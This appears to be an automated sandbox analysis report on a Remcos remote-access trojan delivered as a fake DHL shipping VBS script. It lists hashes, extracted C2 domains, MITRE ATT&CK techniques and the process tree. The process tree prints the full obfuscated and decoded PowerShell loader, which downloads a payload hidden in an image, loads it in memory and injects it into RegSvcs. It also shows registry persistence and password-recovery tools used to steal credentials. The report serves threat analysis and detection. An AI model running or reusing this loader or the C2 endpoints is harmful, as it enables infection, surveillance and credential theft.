remcos | 9ce9b8793d75a23f6ba6ee34f7a82f60e67341834f79bb73ea24e24e905dd468

Analysis

max time kernel
149s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
16-05-2024 06:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

z93DHL_AWB_Shipping0000000.vbs
Size

156KB
MD5

92fb04e0f8028a0889c35bf998aad436
SHA1

1b629e0a8bec9d33c38ca47f043df6f3a3a1cc9d
SHA256

9ce9b8793d75a23f6ba6ee34f7a82f60e67341834f79bb73ea24e24e905dd468
SHA512

8a348f5eb6a48c0773ca00a8186ec1b088caa6cc0c9b1b6f58d82e3837856c4ba2c6b491557b603c858f05deb579a84405f34ff5bfb1654f0bab73adf1dd9a44
SSDEEP

1536:ViS+Od99CObilCocEW1aJK66n5yhtW0/5JpWn4cRx9qSZg0BFbUZlu9gISsRkf:VPdw9JK6X/vcjg0BFcB

Score

10^/10

remcos protected collection execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Protected

janbours92harbu01.duckdns.org:3980

janbours92harbu01.duckdns.org:3981

janbours92harbu02.duckdns.org:3980

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
kajsoiestc.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
aksoiestgb-1YOAXH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/2172-56-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/3888-57-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3888-57-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2868-58-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2172-56-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

9 3124 WScript.exe
11 3124 WScript.exe
29 3904 powershell.exe
36 3904 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3904 powershell.exe
2644 powershell.exe

flow	pid	process
9	3124	WScript.exe
11	3124	WScript.exe
29	3904	powershell.exe
36	3904	powershell.exe

pid	process
3904	powershell.exe
2644	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegSvcs.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegSvcs.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\pleura.vbs"	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegSvcs.exe

description	pid	process	target process
PID 3904 set thread context of 1536	3904	powershell.exe	RegSvcs.exe
PID 1536 set thread context of 3888	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 set thread context of 2172	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 set thread context of 2868	1536	RegSvcs.exe	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exeRegSvcs.exeRegSvcs.exe

pid	process
2644	powershell.exe
2644	powershell.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
3888	RegSvcs.exe
3888	RegSvcs.exe
2868	RegSvcs.exe
2868	RegSvcs.exe
3888	RegSvcs.exe
3888	RegSvcs.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

RegSvcs.exe

pid process

1536 RegSvcs.exe
1536 RegSvcs.exe
1536 RegSvcs.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegSvcs.exe

description pid process

Token: SeDebugPrivilege 2644 powershell.exe
Token: SeDebugPrivilege 3904 powershell.exe
Token: SeDebugPrivilege 2868 RegSvcs.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegSvcs.exe

pid process

1536 RegSvcs.exe

pid	process
1536	RegSvcs.exe
1536	RegSvcs.exe
1536	RegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	2868	RegSvcs.exe

pid	process
1536	RegSvcs.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

WScript.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process	target process
PID 3124 wrote to memory of 2644	3124	WScript.exe	powershell.exe
PID 3124 wrote to memory of 2644	3124	WScript.exe	powershell.exe
PID 2644 wrote to memory of 3904	2644	powershell.exe	powershell.exe
PID 2644 wrote to memory of 3904	2644	powershell.exe	powershell.exe
PID 3904 wrote to memory of 2944	3904	powershell.exe	cmd.exe
PID 3904 wrote to memory of 2944	3904	powershell.exe	cmd.exe
PID 3904 wrote to memory of 2040	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 2040	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 2040	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 4484	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 4484	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 4484	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 3904 wrote to memory of 1536	3904	powershell.exe	RegSvcs.exe
PID 1536 wrote to memory of 3888	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 3888	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 3888	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 3888	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2172	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2172	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2172	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2172	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2868	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2868	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2868	1536	RegSvcs.exe	RegSvcs.exe
PID 1536 wrote to memory of 2868	1536	RegSvcs.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\z93DHL_AWB_Shipping0000000.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreDMDgTreMgBkDgTreDMDgTreMgDgTre2DgTreDEDgTreNgDgTre1DgTreGMDgTreYgBiDgTreC0DgTreMDgTreDgTre0DgTreGYDgTreOQDgTretDgTreGIDgTreMgDgTreyDgTreDQDgTreLQDgTre2DgTreDYDgTreMDgTreDgTre0DgTreC0DgTreZDgTreDgTrewDgTreDgDgTreODgTreDgTrezDgTreDIDgTreZQBmDgTreD0DgTrebgBlDgTreGsDgTrebwB0DgTreCYDgTreYQBpDgTreGQDgTreZQBtDgTreD0DgTredDgTreBsDgTreGEDgTrePwB0DgTreHgDgTredDgTreDgTreuDgTreDEDgTreMDgTreDgTre1DgTreDDgTreDgTreNQDgTrexDgTreHMDgTrebwBjDgTreG0DgTreZQByDgTreHIDgTrebwBzDgTreHMDgTreZQBmDgTreG8DgTrecgBwDgTreC8DgTrebwDgTrevDgTreG0DgTrebwBjDgTreC4DgTredDgTreBvDgTreHDgTreDgTrecwBwDgTreHDgTreDgTreYQDgTreuDgTreGYDgTreYwDgTre3DgTreGEDgTreYgDgTretDgTreDQDgTreMgDgTrewDgTreDIDgTreaDgTreBjDgTreHIDgTreYQBtDgTreC8DgTreYgDgTrevDgTreDDgTreDgTredgDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecwBpDgTreHDgTreDgTreYQBlDgTreGwDgTreZwBvDgTreG8DgTreZwDgTreuDgTreGUDgTreZwBhDgTreHIDgTrebwB0DgTreHMDgTreZQBzDgTreGEDgTreYgBlDgTreHIDgTreaQBmDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreHDgTreDgTrebDgTreBlDgTreHUDgTrecgBhDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreFMDgTredgBjDgTreHMDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('32d326165cbb-04f9-b224-6604-d08832ef=nekot&aidem=tla?txt.105051socmerrosseforp/o/moc.topsppa.fc7ab-4202hcram/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'pleura','RegSvcs',''))} }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\pleura.vbs"
      4⤵
      PID:2944
  - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:2040
  - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:4484
  - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1536
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe /stext "C:\Users\Admin\AppData\Local\Temp\hhbzrpcpecisisezrendew"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3888
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe /stext "C:\Users\Admin\AppData\Local\Temp\rbhsshnrakaxsysdaphfpbvthu"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:2172
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe /stext "C:\Users\Admin\AppData\Local\Temp\uemksaykosskumohrzuysopjqizjw"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=4164 /prefetch:8
1⤵
PID:2300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

